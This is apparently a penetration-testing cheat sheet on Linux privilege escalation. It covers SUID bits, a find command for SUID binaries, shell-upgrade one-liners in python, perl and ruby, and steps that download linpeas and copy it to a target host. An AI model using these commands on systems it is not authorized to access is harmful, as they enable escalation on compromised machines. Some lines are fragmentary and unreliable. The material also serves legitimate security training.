|Permission||On Files||On Directories|
|SUID Bit||User executes the file with permissions of the file owner||-|
|SGID Bit||User executes the file with the permission of the group owner||File created in directory gets the same group owner|
|Sticky Bit||No meaning||Users are prevented from deleting files from other users|
SUID bits can be dangerous, some binaries such as passwd need to be run with elevated privileges (as its resetting your password on the system), however other custom files could that have the SUID bit can lead to all sorts of issues.
To search the a system for these type of files run the following:
find / -perm -u=s -type f 2>/dev/null
Get a TTY Shell
If you get shell without TTY, here are some commands you can try to fix this.
Choose an option based on the what is installed on the system:
/usr/bin/script -qc /bin/bash /dev/null
python -c 'import pty; pty.spawn("/bin/sh")'
perl —e 'exec "/bin/sh";'or
perl: exec "/bin/sh";
ruby: exec "/bin/sh"or from within Interactive Ruby Shell
- Vi from within vi
- nmap interactive mode:
Download linpeas and copy it target e.g. 10.10.112.131
wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh scp linpeas.sh firstname.lastname@example.org:/dev/shm chmod +x linpeas.sh ./linpeas.sh